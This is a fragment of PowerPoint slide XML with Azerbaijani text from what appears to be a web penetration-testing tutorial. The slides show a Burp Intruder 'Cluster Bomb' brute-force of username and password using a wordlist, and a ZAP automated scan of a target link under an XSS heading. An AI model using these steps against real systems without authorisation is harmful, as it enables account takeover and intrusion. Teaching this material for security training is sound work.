          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gələn bağlantını </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İntruder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bölməsinə göndəririk</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tipini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cluster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bomb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seçirik</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Çünki 2 deyişənimiz var həm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> həm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048783" name="Mətn Qutusu 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9907349" y="3438727"/>
            <a:ext cx="2075101" cy="1158240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Yuxardaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> menyudan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bölməsinə keçirik</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048784" name="Düzbucaqlı 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3180945" y="2918297"/>
            <a:ext cx="1076248" cy="19455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85" name="Düzbucaqlı 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209550" y="4533089"/>
            <a:ext cx="8885812" cy="29795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048620"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21" name="Mətn Qutusu 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5762057" y="-438963"/>
            <a:ext cx="3541205" cy="1706649"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" kern="1200" spc="100" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>XSS : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" kern="1200" spc="100" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Açıq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" kern="1200" spc="100" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097158" name="Şəkil 6" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="148470" y="1005840"/>
            <a:ext cx="7206188" cy="2414071"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900" cap="sq" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst>
            <a:innerShdw blurRad="76200">
              <a:srgbClr val="000000"/>
            </a:innerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3145729" name="Straight Connector 22"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7532660"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8622" name="Mətn Qutusu 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7532659" y="1006844"/>
            <a:ext cx="4293427" cy="2533363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="182880">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>shifə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>linkini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>kopyalıyıb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>başda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>dediyimiz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>açıqları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>tapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>programlardan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>birində</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>veririk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048623"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2097159" name="Şəkil 10" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="153028" y="3539203"/>
            <a:ext cx="7201629" cy="2872989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900" cap="sq" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst>
            <a:innerShdw blurRad="76200">
              <a:srgbClr val="000000"/>
            </a:innerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048624" name="Mətn Qutusu 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7668589" y="3692389"/>
            <a:ext cx="4115422" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0"/>
              <a:t>Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1"/>
              <a:t>Linuxda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0"/>
              <a:t> qurulu olaraq gələn</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zaproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1"/>
              <a:t>programına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0"/>
              <a:t> giririk və </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0"/>
              <a:t>bölməsini seçib hədəf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1"/>
              <a:t>linki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1"/>
              <a:t>yapşdırırıq</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0"/>
              <a:t>düyməsinə basaraq</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1"/>
              <a:t>Scanı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0"/>
              <a:t> başladırıq</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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38" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="13820"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3521727"/>
            <a:ext cx="9541067" cy="3336274"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097239" name="Şəkil 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1"/>
            <a:ext cx="9075906" cy="3521727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048786" name="Mətn Qutusu 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9075906" y="105407"/>
            <a:ext cx="3219855" cy="3291841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İstifadə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edəcəyimiz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wordlisti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>load</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bölməsindən </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yüklüyürük</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> və </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> üçün həmən </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wordlisti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>üklədikdən</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sonra hücumu başladırıq</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048787" name="Düzbucaqlı 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252919" y="1060315"/>
            <a:ext cx="2461098" cy="16537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88" name="Düzbucaqlı 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="189835" y="4642005"/>
            <a:ext cx="1833518" cy="13427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89" name="Düzbucaqlı 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252919" y="2203316"/>
            <a:ext cx="865762" cy="16537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90" name="Düzbucaqlı 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252919" y="5896559"/>
            <a:ext cx="535021" cy="13427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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3145736" name="Birbaşa Oxla Birləşdirici 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7937770" y="4280170"/>
            <a:ext cx="924128" cy="1099227"/>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145737" name="Birbaşa Oxla Birləşdirici 18"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6352162" y="2470826"/>
